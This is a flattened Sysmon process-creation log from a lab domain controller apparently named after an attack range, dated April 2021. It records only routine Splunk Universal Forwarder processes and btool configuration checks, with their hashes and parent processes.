AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022919Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:21.261{A8622C2F-4551-6078-9C05-00000000AE01}2768C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022905Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:20.370{A8622C2F-4550-6078-9B05-00000000AE01}828C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022884Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:18.682{A8622C2F-454E-6078-9A05-00000000AE01}6688C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:18.011{A8622C2F-454E-6078-9905-00000000AE01}1332C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022866Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:53:17.136{A8622C2F-454D-6078-9805-00000000AE01}6852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022779Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:23.324{A8622C2F-4517-6078-9705-00000000AE01}1328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022766Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:21.934{A8622C2F-4515-6078-9605-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000022754Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:21.262{A8622C2F-4515-6078-9505-00000000AE01}2072C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022745Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:20.402{A8622C2F-4514-6078-9405-00000000AE01}6648C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022734Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:18.637{A8622C2F-4512-6078-9305-00000000AE01}6700C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022724Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:18.012{A8622C2F-4512-6078-9205-00000000AE01}4000C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022714Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:52:17.137{A8622C2F-4511-6078-9105-00000000AE01}6204C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000022559Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:23.336{A8622C2F-44DB-6078-9005-00000000AE01}5400C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022546Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:21.898{A8622C2F-44D9-6078-8F05-00000000AE01}7164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022534Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:21.226{A8622C2F-44D9-6078-8E05-00000000AE01}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022525Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:20.367{A8622C2F-44D8-6078-8D05-00000000AE01}4896C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022515Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:18.664{A8622C2F-44D6-6078-8C05-00000000AE01}5588C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022504Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
13:51:17.992{A8622C2F-44D5-6078-8B05-00000000AE01}936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:51:17.117{A8622C2F-44D5-6078-8A05-00000000AE01}2248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022410Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:23.337{A8622C2F-449F-6078-8905-00000000AE01}5480C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022398Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:21.744{A8622C2F-449D-6078-8805-00000000AE01}4164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022386Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:50:21.212{A8622C2F-449D-6078-8705-00000000AE01}6868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000022376Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal check-xml-files --answer-yes --no-prompt 2>&1C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000021469Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.356{A8622C2F-43A3-6078-5205-00000000AE01}6364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A3-6078-5105-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 154100x800000000000000021461Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.349{A8622C2F-43A3-6078-5105-00000000AE01}6268C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A3-6078-5005-00000000AE01}6880C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general 
--no-log 154100x800000000000000021453Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.344{A8622C2F-43A3-6078-5005-00000000AE01}6880C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021444Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.043{A8622C2F-43A3-6078-4F05-00000000AE01}7064C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A3-6078-4E05-00000000AE01}4924C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list replication_port --no-log 154100x800000000000000021436Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.036{A8622C2F-43A3-6078-4E05-00000000AE01}4924C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A3-6078-4D05-00000000AE01}3692C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 154100x800000000000000021428Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:11.030{A8622C2F-43A3-6078-4D05-00000000AE01}3692C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021417Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.676{A8622C2F-43A2-6078-4C05-00000000AE01}6780C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd" check-transforms-keysC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 
154100x800000000000000021408Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.351{A8622C2F-43A2-6078-4B05-00000000AE01}4936C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{A8622C2F-43A2-6078-4A05-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warnings 154100x800000000000000021400Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.345{A8622C2F-43A2-6078-4A05-00000000AE01}6592C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{A8622C2F-43A1-6078-4305-00000000AE01}6240C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 154100x800000000000000021391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 13:46:10.031{A8622C2F-43A2-6078-4905-00000000AE01}6640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool validate-strptime --log-warningsC:\Windows\system32\NT 
